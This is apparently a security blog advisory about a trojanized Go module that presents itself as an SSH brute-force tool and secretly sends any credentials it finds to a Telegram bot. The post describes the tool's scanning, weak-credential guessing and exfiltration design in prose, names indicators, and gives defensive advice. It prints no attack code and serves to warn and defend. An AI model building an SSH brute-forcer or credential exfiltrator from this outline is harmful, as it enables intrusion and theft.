Trojanized Go Module Lures Script Kiddies
- SHAH MUHAMMAD ASH-SYAFIQ BIN SHAHRIL
- Sep 4
- 2 min read
A malicious Go module named “golang-random-ip-ssh-bruteforce” has been uncovered masquerading as a legitimate SSH brute-force utility. Distributed via the open-source repository pkg.go.dev, the package is tied to the now-deleted GitHub account IllDieAnyway (G3TT). Although it functions as advertised by scanning random IPv4 addresses and attempting SSH logins with weak credentials, the module contains hidden exfiltration code that automatically transmits any valid credentials it obtains to a Telegram bot controlled by the threat actor. This discovery underscores a growing trend in cybercrime: the weaponization of open source ecosystems to mislead inexperienced users into acting as unwitting accomplices. By packaging malicious code inside a tool marketed toward aspiring hackers, the attacker effectively outsources scanning and password-guessing activities to unsuspecting operators. The scheme follows a parasitic model, in which novice threat actors, (often referred to as “script kiddies”) unknowingly shoulder the operational workload and legal exposure, while the true author collects all rewards. The dynamic can be compared to an ant colony, where the script kiddies serve as worker ants gathering “food” (compromised credentials), and the attacker, acting as the queen, reaps the benefits without ever leaving the nest. This approach allows the malicious actor to maintain anonymity, reduce operational risk, and consolidate stolen credentials with minimal effort.
Attack Details
Functionality:
• Scans random IPv4 addresses on TCP port 22 for open SSH services.
• Attempts logins using a hardcoded username/password list (root/admin with weak passwords such as 1234, qwerty, password, etc.).
• Disables SSH host key verification (ssh.InsecureIgnoreHostKey) to accept any server identity.
• Runs concurrent brute-force attempts for speed.
• On first successful login, sends IP address, username, and password to a Telegram bot (@sshZXC_bot) linked to attacker account @io_ping.
Command & Control (C2):
• Telegram Bot API used for exfiltration, making traffic resemble legitimate HTTPS web requests.
• The malicious module terminates after the first valid credential capture to ensure quick exfiltration.
Threat Actor Profile:
• Associated with offensive tools including IP scanners, Instagram parsers, and a PHP-based botnet called Selica-C2.
• Indicators (including Russian-language content and tool targeting) suggest Russian origin.
Impact
Unwitting Operators Compromised
• Users who run the tool do not retain control over discovered SSH credentials, they are instantly sent to the attacker.
Attribution Shielding
• Scanning and brute-force attempts are traced to the operator’s IP, not the actual threat actor.
Supply Chain Risk
• The malicious module remains publicly available on pkg.go.dev, increasing the risk of wider adoption.
Potential Target Exposure
• Any SSH service using weak credentials (root/admin) is vulnerable to compromise.
The attacker effectively builds a distributed, risk-free scanning network powered by victims who believe they are the attackers themselves.
Recommendation
For Developers / Security Teams
• Avoid downloading offensive security tools from unverified sources.
• Audit any open-source package prior to use, inspect code for network calls or hardcoded exfiltration logic.
For Organizations Running SSH
• Enforce strong SSH passwords and disable password-based logins in favor of key based authentication.
• Monitor for anomalous SSH login attempts from unexpected IP ranges.
For Threat Hunters
• Look for outbound connections to Telegram API endpoints from unusual hosts.
• Correlate SSH brute-force attempts with known indicators of compromise (IoCs, if available).
Comments